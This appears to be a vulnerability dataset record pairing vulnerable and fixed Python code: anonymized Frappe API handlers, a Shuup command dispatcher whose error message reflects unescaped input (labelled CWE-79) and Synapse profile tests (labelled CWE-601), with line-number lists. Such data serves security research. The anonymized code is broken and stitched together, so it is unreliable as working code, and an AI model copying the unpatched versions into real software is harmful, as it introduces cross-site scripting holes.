VAR_25.local.login_manager.logout()
VAR_25.db.commit()
VAR_25.respond_as_web_page(_("Logged Out"), _("You have been successfully logged out"),
indicator_color='green')
@VAR_25.whitelist(allow_guest=True)
def FUNC_8(VAR_9, VAR_10, VAR_11):
VAR_14 = VAR_25.get_doc(VAR_9, VAR_10)
if getattr(VAR_14, VAR_11, VAR_25._dict()).is_whitelisted:
VAR_25.call(getattr(VAR_14, VAR_11), **VAR_25.local.form_dict)
else:
VAR_25.throw(_("Not permitted"), VAR_25.PermissionError)
@VAR_25.whitelist()
def FUNC_9():
VAR_15 = None
try:
if VAR_25.form_dict.get('from_form'):
try:
VAR_15 = VAR_25.get_doc({
"doctype": "File",
"attached_to_name": VAR_25.form_dict.docname,
"attached_to_doctype": VAR_25.form_dict.doctype,
"attached_to_field": VAR_25.form_dict.docfield,
"file_url": VAR_25.form_dict.file_url,
"file_name": VAR_25.form_dict.filename,
"is_private": VAR_25.utils.cint(VAR_25.form_dict.is_private),
"content": VAR_25.form_dict.filedata,
"decode": True
})
VAR_15.save()
except VAR_25.DuplicateEntryError:
VAR_15 = None
VAR_25.db.rollback()
else:
if VAR_25.form_dict.get('method'):
VAR_3 = VAR_25.get_attr(VAR_25.form_dict.method)
FUNC_3(VAR_3)
VAR_15 = VAR_3()
except Exception:
VAR_25.errprint(VAR_25.utils.get_traceback())
VAR_25.response['http_status_code'] = 500
VAR_15 = None
return VAR_15
@VAR_25.whitelist(allow_guest=True)
def FUNC_10():
VAR_16 = None
if VAR_25.session.user == 'Guest':
if VAR_25.get_system_settings('allow_guests_to_upload_files'):
VAR_26 = True
else:
return
else:
VAR_16 = VAR_25.get_doc("User", VAR_25.session.user)
VAR_26 = False
VAR_17 = VAR_25.request.files
VAR_18 = VAR_25.form_dict.is_private
VAR_9 = VAR_25.form_dict.doctype
VAR_19 = VAR_25.form_dict.docname
VAR_20 = VAR_25.form_dict.fieldname
VAR_21 = VAR_25.form_dict.file_url
VAR_22 = VAR_25.form_dict.folder or 'Home'
VAR_3 = VAR_25.form_dict.method
VAR_23 = None
VAR_24 = None
if 'file' in VAR_17:
VAR_27 = VAR_17['file']
VAR_23 = VAR_27.stream.read()
VAR_24 = VAR_27.filename
VAR_25.local.uploaded_file = VAR_23
VAR_25.local.uploaded_filename = VAR_24
if VAR_25.session.user == 'Guest' or (VAR_16 and not VAR_16.has_desk_access()):
import mimetypes
VAR_28 = mimetypes.guess_type(VAR_24)[0]
if VAR_28 not in VAR_0:
VAR_25.throw(_("You can only upload JPG, PNG, PDF, or Microsoft documents."))
if VAR_3:
VAR_3 = VAR_25.get_attr(VAR_3)
FUNC_3(VAR_3)
return VAR_3()
else:
VAR_15 = VAR_25.get_doc({
"doctype": "File",
"attached_to_doctype": VAR_9,
"attached_to_name": VAR_19,
"attached_to_field": VAR_20,
"folder": VAR_22,
"file_name": VAR_24,
"file_url": VAR_21,
"is_private": cint(VAR_18),
"content": VAR_23
})
VAR_15.save(VAR_26=ignore_permissions)
return VAR_15
def FUNC_11(VAR_1):
if '.' in VAR_1:
VAR_3 = VAR_25.get_attr(VAR_1)
else:
VAR_3 = globals()[VAR_1]
VAR_25.log("method:" + VAR_1)
return VAR_3
@VAR_25.whitelist(allow_guest = True)
def FUNC_12():
return "pong"
|
from __future__ import unicode_literals
from werkzeug.wrappers import Response
from six import text_type, string_types, StringIO
import .frappe
import .frappe.utils
import .frappe.sessions
import .frappe.desk.form.run_method
from VAR_24.utils import cint
from VAR_24.api import validate_auth
from VAR_24 import _, is_whitelisted
from VAR_24.utils.response import build_response
from VAR_24.utils.csvutils import build_csv_response
from VAR_24.core.doctype.server_script.server_script_utils import .run_server_script_api
VAR_0 = ('image/png', 'image/jpeg', 'application/pdf', 'application/msword',
'application/vnd.openxmlformats-officedocument.wordprocessingml.document',
'application/vnd.ms-excel', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
'application/vnd.oasis.opendocument.text', 'application/vnd.oasis.opendocument.spreadsheet')
def FUNC_0():
validate_auth()
VAR_1 = VAR_24.local.form_dict.cmd
VAR_10 = None
if VAR_1!='login':
VAR_10 = FUNC_1(VAR_1)
if VAR_10 is not None:
if isinstance(VAR_10, Response):
return VAR_10
VAR_24.response['message'] = VAR_10
return build_response("json")
def FUNC_1(VAR_1, VAR_2=False):
for hook in VAR_24.get_hooks("override_whitelisted_methods", {}).get(VAR_1, []):
VAR_1 = hook
break
if run_server_script_api(VAR_1):
return None
try:
VAR_3 = FUNC_8(VAR_1)
except Exception as e:
if VAR_24.local.conf.developer_mode:
raise e
else:
VAR_24.respond_as_web_page(title='Invalid Method', html='Method not found',
indicator_color='red', http_status_code=404)
return
if VAR_2:
VAR_3 = method.queue
if VAR_3 != FUNC_10:
is_whitelisted(VAR_3)
FUNC_2(VAR_3)
return VAR_24.call(VAR_3, **VAR_24.form_dict)
def FUNC_2(VAR_3):
VAR_11 = VAR_24.local.request.method
if VAR_11 not in VAR_24.allowed_http_methods_for_whitelisted_func[VAR_3]:
VAR_24.throw(_("Not permitted"), VAR_24.PermissionError)
@VAR_24.whitelist(allow_guest=True)
def FUNC_3():
return VAR_24.__version__
@VAR_24.whitelist(allow_guest=True)
def FUNC_4():
VAR_24.local.login_manager.logout()
VAR_24.db.commit()
@VAR_24.whitelist(allow_guest=True)
def FUNC_5():
VAR_24.local.login_manager.logout()
VAR_24.db.commit()
VAR_24.respond_as_web_page(_("Logged Out"), _("You have been successfully logged out"),
indicator_color='green')
@VAR_24.whitelist()
def FUNC_6():
VAR_12 = None
try:
if VAR_24.form_dict.get('from_form'):
try:
VAR_12 = VAR_24.get_doc({
"doctype": "File",
"attached_to_name": VAR_24.form_dict.docname,
"attached_to_doctype": VAR_24.form_dict.doctype,
"attached_to_field": VAR_24.form_dict.docfield,
"file_url": VAR_24.form_dict.file_url,
"file_name": VAR_24.form_dict.filename,
"is_private": VAR_24.utils.cint(VAR_24.form_dict.is_private),
"content": VAR_24.form_dict.filedata,
"decode": True
})
VAR_12.save()
except VAR_24.DuplicateEntryError:
VAR_12 = None
VAR_24.db.rollback()
else:
if VAR_24.form_dict.get('method'):
VAR_3 = VAR_24.get_attr(VAR_24.form_dict.method)
is_whitelisted(VAR_3)
VAR_12 = VAR_3()
except Exception:
VAR_24.errprint(VAR_24.utils.get_traceback())
VAR_24.response['http_status_code'] = 500
VAR_12 = None
return VAR_12
@VAR_24.whitelist(allow_guest=True)
def FUNC_7():
VAR_13 = None
if VAR_24.session.user == 'Guest':
if VAR_24.get_system_settings('allow_guests_to_upload_files'):
VAR_25 = True
else:
return
else:
VAR_13 = VAR_24.get_doc("User", VAR_24.session.user)
VAR_25 = False
VAR_14 = VAR_24.request.files
VAR_15 = VAR_24.form_dict.is_private
VAR_16 = VAR_24.form_dict.doctype
VAR_17 = VAR_24.form_dict.docname
VAR_18 = VAR_24.form_dict.fieldname
VAR_19 = VAR_24.form_dict.file_url
VAR_20 = VAR_24.form_dict.folder or 'Home'
VAR_3 = VAR_24.form_dict.method
VAR_21 = None
VAR_22 = None
if 'file' in VAR_14:
VAR_26 = VAR_14['file']
VAR_21 = VAR_26.stream.read()
VAR_22 = VAR_26.filename
VAR_24.local.uploaded_file = VAR_21
VAR_24.local.uploaded_filename = VAR_22
if VAR_24.session.user == 'Guest' or (VAR_13 and not VAR_13.has_desk_access()):
import mimetypes
VAR_27 = mimetypes.guess_type(VAR_22)[0]
if VAR_27 not in VAR_0:
VAR_24.throw(_("You can only upload JPG, PNG, PDF, or Microsoft documents."))
if VAR_3:
VAR_3 = VAR_24.get_attr(VAR_3)
is_whitelisted(VAR_3)
return VAR_3()
else:
VAR_12 = VAR_24.get_doc({
"doctype": "File",
"attached_to_doctype": VAR_16,
"attached_to_name": VAR_17,
"attached_to_field": VAR_18,
"folder": VAR_20,
"file_name": VAR_22,
"file_url": VAR_19,
"is_private": cint(VAR_15),
"content": VAR_21
})
VAR_12.save(VAR_25=ignore_permissions)
return VAR_12
def FUNC_8(VAR_1):
if '.' in VAR_1:
VAR_3 = VAR_24.get_attr(VAR_1)
else:
VAR_3 = globals()[VAR_1]
VAR_24.log("method:" + VAR_1)
return VAR_3
@VAR_24.whitelist(allow_guest=True)
def FUNC_9():
return "pong"
@VAR_24.whitelist()
def FUNC_10(VAR_3, VAR_4=None, VAR_5=None, VAR_6=None, VAR_7=None, VAR_8=None):
import json, inspect
if not VAR_8: args = VAR_7 or ""
if VAR_5: # not called from a VAR_16 (from a page)
if not VAR_6: dn = VAR_5 # single
VAR_28 = VAR_24.get_doc(VAR_5, VAR_6)
else:
VAR_28 = VAR_24.get_doc(json.loads(VAR_4))
VAR_28._original_modified = VAR_28.modified
VAR_28.check_if_latest()
if not VAR_28.has_permission("read"):
VAR_24.msgprint(_("Not permitted"), raise_exception = True)
if not VAR_28:
return
try:
VAR_8 = json.loads(VAR_8)
except ValueError:
VAR_8 = args
VAR_23 = getattr(VAR_28, VAR_3)
is_whitelisted(getattr(VAR_23, '__func__', VAR_23))
try:
VAR_29 = inspect.getargspec(VAR_23)[0]
except ValueError:
VAR_29 = inspect.getfullargspec(VAR_23).args
if not VAR_29 or (len(VAR_29)==1 and VAR_29[0]=="self"):
VAR_30 = VAR_28.run_method(VAR_3)
elif "args" in VAR_29 or not isinstance(VAR_8, dict):
VAR_30 = VAR_28.run_method(VAR_3, VAR_8)
else:
VAR_30 = VAR_28.run_method(VAR_3, **VAR_8)
VAR_24.response.docs.append(VAR_28)
if not VAR_30:
return
if cint(VAR_24.form_dict.get('as_csv')):
build_csv_response(VAR_30, VAR_28.doctype.replace(' ', ''))
return
VAR_24.response['message'] = VAR_30
VAR_9 = FUNC_10
| [
1,
2,
3,
16,
21,
22,
28,
31,
32,
35,
37,
38,
40,
42,
46,
49,
50,
53,
63,
66,
69,
71,
74,
77,
79,
83,
85,
86,
90,
94,
98,
102,
107,
114,
123,
127,
144,
156,
158,
170,
181,
186,
189,
195,
214,
215,
224,
228,
24,
44,
117,
217
] | [
1,
2,
3,
5,
8,
13,
20,
21,
26,
27,
33,
36,
37,
40,
42,
43,
45,
47,
51,
54,
55,
58,
68,
71,
75,
77,
80,
83,
87,
92,
99,
103,
120,
132,
134,
146,
157,
162,
165,
171,
190,
191,
200,
204,
209,
211,
215,
220,
223,
226,
231,
234,
239,
242,
245,
248,
250,
253,
254,
258,
260,
261,
263,
29,
49,
193,
207
] |
1CWE-79
| # -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2021, Shuup Commerce Inc. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from django.http.response import HttpResponseRedirect
from shuup.utils.excs import Problem
from shuup.xtheme.editing import set_edit_mode
def handle_command(request, command):
"""
Internal dispatch function.
:param request: A request
:type request: django.http.HttpRequest
:param command: Command string
:type command: str
:return: A response
:rtype: django.http.HttpResponse
"""
path = request.POST.get("path") or request.META.get("HTTP_REFERER") or "/"
if command == "edit_on" or command == "edit_off":
set_edit_mode(request, command.endswith("_on"))
return HttpResponseRedirect(path)
def command_dispatch(request):
"""
Xtheme command dispatch view.
:param request: A request
:type request: django.http.HttpRequest
:return: A response
:rtype: django.http.HttpResponse
"""
command = request.POST.get("command")
if command:
response = handle_command(request, command)
if response:
return response
raise Problem("Error! Unknown command: `%r`" % command)
| # -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2021, Shuup Commerce Inc. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from django.http.response import HttpResponseRedirect
from django.utils.html import escape
from shuup.utils.excs import Problem
from shuup.xtheme.editing import set_edit_mode
def handle_command(request, command):
"""
Internal dispatch function.
:param request: A request
:type request: django.http.HttpRequest
:param command: Command string
:type command: str
:return: A response
:rtype: django.http.HttpResponse
"""
path = request.POST.get("path") or request.META.get("HTTP_REFERER") or "/"
if command == "edit_on" or command == "edit_off":
set_edit_mode(request, command.endswith("_on"))
return HttpResponseRedirect(path)
def command_dispatch(request):
"""
Xtheme command dispatch view.
:param request: A request
:type request: django.http.HttpRequest
:return: A response
:rtype: django.http.HttpResponse
"""
command = request.POST.get("command")
if command:
response = handle_command(request, command)
if response:
return response
raise Problem("Error! Unknown command: `%r`" % escape(command))
| xss | {
"code": [
" raise Problem(\"Error! Unknown command: `%r`\" % command)"
],
"line_no": [
45
]
} | {
"code": [
" raise Problem(\"Error! Unknown command: `%r`\" % escape(command))"
],
"line_no": [
46
]
} |
from django.http.response import HttpResponseRedirect
from shuup.utils.excs import Problem
from shuup.xtheme.editing import set_edit_mode
def FUNC_0(VAR_0, VAR_1):
VAR_2 = VAR_0.POST.get("path") or VAR_0.META.get("HTTP_REFERER") or "/"
if VAR_1 == "edit_on" or VAR_1 == "edit_off":
set_edit_mode(VAR_0, VAR_1.endswith("_on"))
return HttpResponseRedirect(VAR_2)
def FUNC_1(VAR_0):
VAR_1 = VAR_0.POST.get("command")
if VAR_1:
VAR_3 = FUNC_0(VAR_0, VAR_1)
if VAR_3:
return VAR_3
raise Problem("Error! Unknown VAR_1: `%r`" % VAR_1)
|
from django.http.response import HttpResponseRedirect
from django.utils.html import escape
from shuup.utils.excs import Problem
from shuup.xtheme.editing import set_edit_mode
def FUNC_0(VAR_0, VAR_1):
VAR_2 = VAR_0.POST.get("path") or VAR_0.META.get("HTTP_REFERER") or "/"
if VAR_1 == "edit_on" or VAR_1 == "edit_off":
set_edit_mode(VAR_0, VAR_1.endswith("_on"))
return HttpResponseRedirect(VAR_2)
def FUNC_1(VAR_0):
VAR_1 = VAR_0.POST.get("command")
if VAR_1:
VAR_3 = FUNC_0(VAR_0, VAR_1)
if VAR_3:
return VAR_3
raise Problem("Error! Unknown VAR_1: `%r`" % escape(VAR_1))
| [
1,
2,
3,
4,
5,
6,
7,
9,
12,
13,
17,
29,
30,
34,
46,
15,
16,
17,
18,
19,
20,
21,
22,
23,
24,
32,
33,
34,
35,
36,
37,
38,
39
] | [
1,
2,
3,
4,
5,
6,
7,
10,
13,
14,
18,
30,
31,
35,
47,
16,
17,
18,
19,
20,
21,
22,
23,
24,
25,
33,
34,
35,
36,
37,
38,
39,
40
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests REST events for /profile paths."""
import json
from mock import Mock
from twisted.internet import defer
import synapse.types
from synapse.api.errors import AuthError, SynapseError
from synapse.rest import admin
from synapse.rest.client.v1 import login, profile, room
from tests import unittest
from ....utils import MockHttpResource, setup_test_homeserver
myid = "@1234ABCD:test"
PATH_PREFIX = "/_matrix/client/r0"
class MockHandlerProfileTestCase(unittest.TestCase):
""" Tests rest layer of profile management.
Todo: move these into ProfileTestCase
"""
@defer.inlineCallbacks
def setUp(self):
self.mock_resource = MockHttpResource(prefix=PATH_PREFIX)
self.mock_handler = Mock(
spec=[
"get_displayname",
"set_displayname",
"get_avatar_url",
"set_avatar_url",
"check_profile_query_allowed",
]
)
self.mock_handler.get_displayname.return_value = defer.succeed(Mock())
self.mock_handler.set_displayname.return_value = defer.succeed(Mock())
self.mock_handler.get_avatar_url.return_value = defer.succeed(Mock())
self.mock_handler.set_avatar_url.return_value = defer.succeed(Mock())
self.mock_handler.check_profile_query_allowed.return_value = defer.succeed(
Mock()
)
hs = yield setup_test_homeserver(
self.addCleanup,
"test",
http_client=None,
resource_for_client=self.mock_resource,
federation=Mock(),
federation_client=Mock(),
profile_handler=self.mock_handler,
)
async def _get_user_by_req(request=None, allow_guest=False):
return synapse.types.create_requester(myid)
hs.get_auth().get_user_by_req = _get_user_by_req
profile.register_servlets(hs, self.mock_resource)
@defer.inlineCallbacks
def test_get_my_name(self):
mocked_get = self.mock_handler.get_displayname
mocked_get.return_value = defer.succeed("Frank")
(code, response) = yield self.mock_resource.trigger(
"GET", "/profile/%s/displayname" % (myid), None
)
self.assertEquals(200, code)
self.assertEquals({"displayname": "Frank"}, response)
self.assertEquals(mocked_get.call_args[0][0].localpart, "1234ABCD")
@defer.inlineCallbacks
def test_set_my_name(self):
mocked_set = self.mock_handler.set_displayname
mocked_set.return_value = defer.succeed(())
(code, response) = yield self.mock_resource.trigger(
"PUT", "/profile/%s/displayname" % (myid), b'{"displayname": "Frank Jr."}'
)
self.assertEquals(200, code)
self.assertEquals(mocked_set.call_args[0][0].localpart, "1234ABCD")
self.assertEquals(mocked_set.call_args[0][1].user.localpart, "1234ABCD")
self.assertEquals(mocked_set.call_args[0][2], "Frank Jr.")
@defer.inlineCallbacks
def test_set_my_name_noauth(self):
mocked_set = self.mock_handler.set_displayname
mocked_set.side_effect = AuthError(400, "message")
(code, response) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/displayname" % ("@4567:test"),
b'{"displayname": "Frank Jr."}',
)
self.assertTrue(400 <= code < 499, msg="code %d is in the 4xx range" % (code))
@defer.inlineCallbacks
def test_get_other_name(self):
mocked_get = self.mock_handler.get_displayname
mocked_get.return_value = defer.succeed("Bob")
(code, response) = yield self.mock_resource.trigger(
"GET", "/profile/%s/displayname" % ("@opaque:elsewhere"), None
)
self.assertEquals(200, code)
self.assertEquals({"displayname": "Bob"}, response)
@defer.inlineCallbacks
def test_set_other_name(self):
mocked_set = self.mock_handler.set_displayname
mocked_set.side_effect = SynapseError(400, "message")
(code, response) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/displayname" % ("@opaque:elsewhere"),
b'{"displayname":"bob"}',
)
self.assertTrue(400 <= code <= 499, msg="code %d is in the 4xx range" % (code))
@defer.inlineCallbacks
def test_get_my_avatar(self):
mocked_get = self.mock_handler.get_avatar_url
mocked_get.return_value = defer.succeed("http://my.server/me.png")
(code, response) = yield self.mock_resource.trigger(
"GET", "/profile/%s/avatar_url" % (myid), None
)
self.assertEquals(200, code)
self.assertEquals({"avatar_url": "http://my.server/me.png"}, response)
self.assertEquals(mocked_get.call_args[0][0].localpart, "1234ABCD")
@defer.inlineCallbacks
def test_set_my_avatar(self):
mocked_set = self.mock_handler.set_avatar_url
mocked_set.return_value = defer.succeed(())
(code, response) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/avatar_url" % (myid),
b'{"avatar_url": "http://my.server/pic.gif"}',
)
self.assertEquals(200, code)
self.assertEquals(mocked_set.call_args[0][0].localpart, "1234ABCD")
self.assertEquals(mocked_set.call_args[0][1].user.localpart, "1234ABCD")
self.assertEquals(mocked_set.call_args[0][2], "http://my.server/pic.gif")
class ProfileTestCase(unittest.HomeserverTestCase):
servlets = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
]
def make_homeserver(self, reactor, clock):
self.hs = self.setup_test_homeserver()
return self.hs
def prepare(self, reactor, clock, hs):
self.owner = self.register_user("owner", "pass")
self.owner_tok = self.login("owner", "pass")
def test_set_displayname(self):
request, channel = self.make_request(
"PUT",
"/profile/%s/displayname" % (self.owner,),
content=json.dumps({"displayname": "test"}),
access_token=self.owner_tok,
)
self.assertEqual(channel.code, 200, channel.result)
res = self.get_displayname()
self.assertEqual(res, "test")
def test_set_displayname_too_long(self):
"""Attempts to set a stupid displayname should get a 400"""
request, channel = self.make_request(
"PUT",
"/profile/%s/displayname" % (self.owner,),
content=json.dumps({"displayname": "test" * 100}),
access_token=self.owner_tok,
)
self.assertEqual(channel.code, 400, channel.result)
res = self.get_displayname()
self.assertEqual(res, "owner")
def get_displayname(self):
request, channel = self.make_request(
"GET", "/profile/%s/displayname" % (self.owner,)
)
self.assertEqual(channel.code, 200, channel.result)
return channel.json_body["displayname"]
class ProfilesRestrictedTestCase(unittest.HomeserverTestCase):
servlets = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
room.register_servlets,
]
def make_homeserver(self, reactor, clock):
config = self.default_config()
config["require_auth_for_profile_requests"] = True
config["limit_profile_requests_to_users_who_share_rooms"] = True
self.hs = self.setup_test_homeserver(config=config)
return self.hs
def prepare(self, reactor, clock, hs):
# User owning the requested profile.
self.owner = self.register_user("owner", "pass")
self.owner_tok = self.login("owner", "pass")
self.profile_url = "/profile/%s" % (self.owner)
# User requesting the profile.
self.requester = self.register_user("requester", "pass")
self.requester_tok = self.login("requester", "pass")
self.room_id = self.helper.create_room_as(self.owner, tok=self.owner_tok)
def test_no_auth(self):
self.try_fetch_profile(401)
def test_not_in_shared_room(self):
self.ensure_requester_left_room()
self.try_fetch_profile(403, access_token=self.requester_tok)
def test_in_shared_room(self):
self.ensure_requester_left_room()
self.helper.join(room=self.room_id, user=self.requester, tok=self.requester_tok)
self.try_fetch_profile(200, self.requester_tok)
def try_fetch_profile(self, expected_code, access_token=None):
self.request_profile(expected_code, access_token=access_token)
self.request_profile(
expected_code, url_suffix="/displayname", access_token=access_token
)
self.request_profile(
expected_code, url_suffix="/avatar_url", access_token=access_token
)
def request_profile(self, expected_code, url_suffix="", access_token=None):
request, channel = self.make_request(
"GET", self.profile_url + url_suffix, access_token=access_token
)
self.assertEqual(channel.code, expected_code, channel.result)
def ensure_requester_left_room(self):
try:
self.helper.leave(
room=self.room_id, user=self.requester, tok=self.requester_tok
)
except AssertionError:
# We don't care whether the leave request didn't return a 200 (e.g.
# if the user isn't already in the room), because we only want to
# make sure the user isn't in the room.
pass
class OwnProfileUnrestrictedTestCase(unittest.HomeserverTestCase):
servlets = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
]
def make_homeserver(self, reactor, clock):
config = self.default_config()
config["require_auth_for_profile_requests"] = True
config["limit_profile_requests_to_users_who_share_rooms"] = True
self.hs = self.setup_test_homeserver(config=config)
return self.hs
def prepare(self, reactor, clock, hs):
# User requesting the profile.
self.requester = self.register_user("requester", "pass")
self.requester_tok = self.login("requester", "pass")
def test_can_lookup_own_profile(self):
"""Tests that a user can lookup their own profile without having to be in a room
if 'require_auth_for_profile_requests' is set to true in the server's config.
"""
request, channel = self.make_request(
"GET", "/profile/" + self.requester, access_token=self.requester_tok
)
self.assertEqual(channel.code, 200, channel.result)
request, channel = self.make_request(
"GET",
"/profile/" + self.requester + "/displayname",
access_token=self.requester_tok,
)
self.assertEqual(channel.code, 200, channel.result)
request, channel = self.make_request(
"GET",
"/profile/" + self.requester + "/avatar_url",
access_token=self.requester_tok,
)
self.assertEqual(channel.code, 200, channel.result)
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests REST events for /profile paths."""
import json
from mock import Mock
from twisted.internet import defer
import synapse.types
from synapse.api.errors import AuthError, SynapseError
from synapse.rest import admin
from synapse.rest.client.v1 import login, profile, room
from tests import unittest
from ....utils import MockHttpResource, setup_test_homeserver
myid = "@1234ABCD:test"
PATH_PREFIX = "/_matrix/client/r0"
class MockHandlerProfileTestCase(unittest.TestCase):
""" Tests rest layer of profile management.
Todo: move these into ProfileTestCase
"""
@defer.inlineCallbacks
def setUp(self):
self.mock_resource = MockHttpResource(prefix=PATH_PREFIX)
self.mock_handler = Mock(
spec=[
"get_displayname",
"set_displayname",
"get_avatar_url",
"set_avatar_url",
"check_profile_query_allowed",
]
)
self.mock_handler.get_displayname.return_value = defer.succeed(Mock())
self.mock_handler.set_displayname.return_value = defer.succeed(Mock())
self.mock_handler.get_avatar_url.return_value = defer.succeed(Mock())
self.mock_handler.set_avatar_url.return_value = defer.succeed(Mock())
self.mock_handler.check_profile_query_allowed.return_value = defer.succeed(
Mock()
)
hs = yield setup_test_homeserver(
self.addCleanup,
"test",
federation_http_client=None,
resource_for_client=self.mock_resource,
federation=Mock(),
federation_client=Mock(),
profile_handler=self.mock_handler,
)
async def _get_user_by_req(request=None, allow_guest=False):
return synapse.types.create_requester(myid)
hs.get_auth().get_user_by_req = _get_user_by_req
profile.register_servlets(hs, self.mock_resource)
@defer.inlineCallbacks
def test_get_my_name(self):
mocked_get = self.mock_handler.get_displayname
mocked_get.return_value = defer.succeed("Frank")
(code, response) = yield self.mock_resource.trigger(
"GET", "/profile/%s/displayname" % (myid), None
)
self.assertEquals(200, code)
self.assertEquals({"displayname": "Frank"}, response)
self.assertEquals(mocked_get.call_args[0][0].localpart, "1234ABCD")
@defer.inlineCallbacks
def test_set_my_name(self):
mocked_set = self.mock_handler.set_displayname
mocked_set.return_value = defer.succeed(())
(code, response) = yield self.mock_resource.trigger(
"PUT", "/profile/%s/displayname" % (myid), b'{"displayname": "Frank Jr."}'
)
self.assertEquals(200, code)
self.assertEquals(mocked_set.call_args[0][0].localpart, "1234ABCD")
self.assertEquals(mocked_set.call_args[0][1].user.localpart, "1234ABCD")
self.assertEquals(mocked_set.call_args[0][2], "Frank Jr.")
@defer.inlineCallbacks
def test_set_my_name_noauth(self):
mocked_set = self.mock_handler.set_displayname
mocked_set.side_effect = AuthError(400, "message")
(code, response) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/displayname" % ("@4567:test"),
b'{"displayname": "Frank Jr."}',
)
self.assertTrue(400 <= code < 499, msg="code %d is in the 4xx range" % (code))
@defer.inlineCallbacks
def test_get_other_name(self):
mocked_get = self.mock_handler.get_displayname
mocked_get.return_value = defer.succeed("Bob")
(code, response) = yield self.mock_resource.trigger(
"GET", "/profile/%s/displayname" % ("@opaque:elsewhere"), None
)
self.assertEquals(200, code)
self.assertEquals({"displayname": "Bob"}, response)
@defer.inlineCallbacks
def test_set_other_name(self):
mocked_set = self.mock_handler.set_displayname
mocked_set.side_effect = SynapseError(400, "message")
(code, response) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/displayname" % ("@opaque:elsewhere"),
b'{"displayname":"bob"}',
)
self.assertTrue(400 <= code <= 499, msg="code %d is in the 4xx range" % (code))
@defer.inlineCallbacks
def test_get_my_avatar(self):
mocked_get = self.mock_handler.get_avatar_url
mocked_get.return_value = defer.succeed("http://my.server/me.png")
(code, response) = yield self.mock_resource.trigger(
"GET", "/profile/%s/avatar_url" % (myid), None
)
self.assertEquals(200, code)
self.assertEquals({"avatar_url": "http://my.server/me.png"}, response)
self.assertEquals(mocked_get.call_args[0][0].localpart, "1234ABCD")
@defer.inlineCallbacks
def test_set_my_avatar(self):
mocked_set = self.mock_handler.set_avatar_url
mocked_set.return_value = defer.succeed(())
(code, response) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/avatar_url" % (myid),
b'{"avatar_url": "http://my.server/pic.gif"}',
)
self.assertEquals(200, code)
self.assertEquals(mocked_set.call_args[0][0].localpart, "1234ABCD")
self.assertEquals(mocked_set.call_args[0][1].user.localpart, "1234ABCD")
self.assertEquals(mocked_set.call_args[0][2], "http://my.server/pic.gif")
class ProfileTestCase(unittest.HomeserverTestCase):
servlets = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
]
def make_homeserver(self, reactor, clock):
self.hs = self.setup_test_homeserver()
return self.hs
def prepare(self, reactor, clock, hs):
self.owner = self.register_user("owner", "pass")
self.owner_tok = self.login("owner", "pass")
def test_set_displayname(self):
request, channel = self.make_request(
"PUT",
"/profile/%s/displayname" % (self.owner,),
content=json.dumps({"displayname": "test"}),
access_token=self.owner_tok,
)
self.assertEqual(channel.code, 200, channel.result)
res = self.get_displayname()
self.assertEqual(res, "test")
def test_set_displayname_too_long(self):
"""Attempts to set a stupid displayname should get a 400"""
request, channel = self.make_request(
"PUT",
"/profile/%s/displayname" % (self.owner,),
content=json.dumps({"displayname": "test" * 100}),
access_token=self.owner_tok,
)
self.assertEqual(channel.code, 400, channel.result)
res = self.get_displayname()
self.assertEqual(res, "owner")
def get_displayname(self):
request, channel = self.make_request(
"GET", "/profile/%s/displayname" % (self.owner,)
)
self.assertEqual(channel.code, 200, channel.result)
return channel.json_body["displayname"]
class ProfilesRestrictedTestCase(unittest.HomeserverTestCase):
servlets = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
room.register_servlets,
]
def make_homeserver(self, reactor, clock):
config = self.default_config()
config["require_auth_for_profile_requests"] = True
config["limit_profile_requests_to_users_who_share_rooms"] = True
self.hs = self.setup_test_homeserver(config=config)
return self.hs
def prepare(self, reactor, clock, hs):
# User owning the requested profile.
self.owner = self.register_user("owner", "pass")
self.owner_tok = self.login("owner", "pass")
self.profile_url = "/profile/%s" % (self.owner)
# User requesting the profile.
self.requester = self.register_user("requester", "pass")
self.requester_tok = self.login("requester", "pass")
self.room_id = self.helper.create_room_as(self.owner, tok=self.owner_tok)
def test_no_auth(self):
self.try_fetch_profile(401)
def test_not_in_shared_room(self):
self.ensure_requester_left_room()
self.try_fetch_profile(403, access_token=self.requester_tok)
def test_in_shared_room(self):
self.ensure_requester_left_room()
self.helper.join(room=self.room_id, user=self.requester, tok=self.requester_tok)
self.try_fetch_profile(200, self.requester_tok)
def try_fetch_profile(self, expected_code, access_token=None):
self.request_profile(expected_code, access_token=access_token)
self.request_profile(
expected_code, url_suffix="/displayname", access_token=access_token
)
self.request_profile(
expected_code, url_suffix="/avatar_url", access_token=access_token
)
